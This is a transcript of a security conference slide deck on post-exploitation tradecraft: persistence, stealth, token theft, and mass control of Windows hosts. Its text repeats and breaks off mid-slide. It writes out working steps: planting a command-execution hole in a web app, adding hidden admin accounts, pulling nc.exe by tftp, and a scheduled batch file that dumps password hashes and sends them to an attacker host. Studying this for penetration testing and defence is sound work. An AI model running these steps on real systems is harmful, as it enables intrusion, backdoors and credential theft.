Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst...
Transcript of Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst...
Slide 1
Meta-Post Exploitation
Val Smith (Valsmithoffensivecomputingnet)Colin Ames (amescoffensivecomputingnet)
Using Old Lost Forgotten Knowledge
Slide 2
Valsmithndash Affiliations
bull Offensive Computingbull Metasploitbull cDc
ndash Workbull Malware Analystbull Reverse Engineerbull Penetration Testerbull Exploit developer
Slide 3
Colin Amesndash Security Researcher Offensive Computingndash Steganography Researchndash Penetration Testingndash Reverse Engineeringndash Malware Analysis
Slide 4
bull What is thisndash Follow up to Valrsquos and HD Moorersquos
Tactical Exploitation talk from last yearndash A talk about the use of automation
and tactical tools post-exploitationndash Applied techniques ndash Good for LARGE environmentsndash Different perspectives some old
some forgotten some new
Slide 5
Post Exploitation Concepts Overview
Slide 6
What Is Post Exploitation
bull Itrsquos what you do after you get rootndash Note This talk assumes you have access
bull Includesndash Password Managementndash Persistencendash Stealth Evading Detectionndash User Identity Theftndash Feature Modificationndash Automation amp Mass 0wnage
Slide 7
What Is Post Exploitation
bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along
bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone
bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)
Slide 8
Password Management
Slide 9
Why Password Management
ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many
systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets
you crack fasterndash Aids in cleanup stage
bull Tying accounts to systems
Slide 10
Password Management Goals
ndash Acquired password storage ndash Organization and tracking
bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what
resourcesndash Re-use for further accessndash Expanding wordlist for faster
cracking
Slide 11
Password Management Stages amp Techniques
ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing
ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact
Slide 12
Manual Password Management
bull Existing Toolsndash L0phtCrack
bull Stores passwords in session filesndash CainampAbel
bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)
ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability
ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 2
Valsmithndash Affiliations
bull Offensive Computingbull Metasploitbull cDc
ndash Workbull Malware Analystbull Reverse Engineerbull Penetration Testerbull Exploit developer
Slide 3
Colin Amesndash Security Researcher Offensive Computingndash Steganography Researchndash Penetration Testingndash Reverse Engineeringndash Malware Analysis
Slide 4
bull What is thisndash Follow up to Valrsquos and HD Moorersquos
Tactical Exploitation talk from last yearndash A talk about the use of automation
and tactical tools post-exploitationndash Applied techniques ndash Good for LARGE environmentsndash Different perspectives some old
some forgotten some new
Slide 5
Post Exploitation Concepts Overview
Slide 6
What Is Post Exploitation
bull Itrsquos what you do after you get rootndash Note This talk assumes you have access
bull Includesndash Password Managementndash Persistencendash Stealth Evading Detectionndash User Identity Theftndash Feature Modificationndash Automation amp Mass 0wnage
Slide 7
What Is Post Exploitation
bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along
bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone
bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)
Slide 8
Password Management
Slide 9
Why Password Management
ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many
systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets
you crack fasterndash Aids in cleanup stage
bull Tying accounts to systems
Slide 10
Password Management Goals
ndash Acquired password storage ndash Organization and tracking
bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what
resourcesndash Re-use for further accessndash Expanding wordlist for faster
cracking
Slide 11
Password Management Stages amp Techniques
ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing
ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact
Slide 12
Manual Password Management
bull Existing Toolsndash L0phtCrack
bull Stores passwords in session filesndash CainampAbel
bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)
ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability
ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 3
Colin Amesndash Security Researcher Offensive Computingndash Steganography Researchndash Penetration Testingndash Reverse Engineeringndash Malware Analysis
Slide 4
bull What is thisndash Follow up to Valrsquos and HD Moorersquos
Tactical Exploitation talk from last yearndash A talk about the use of automation
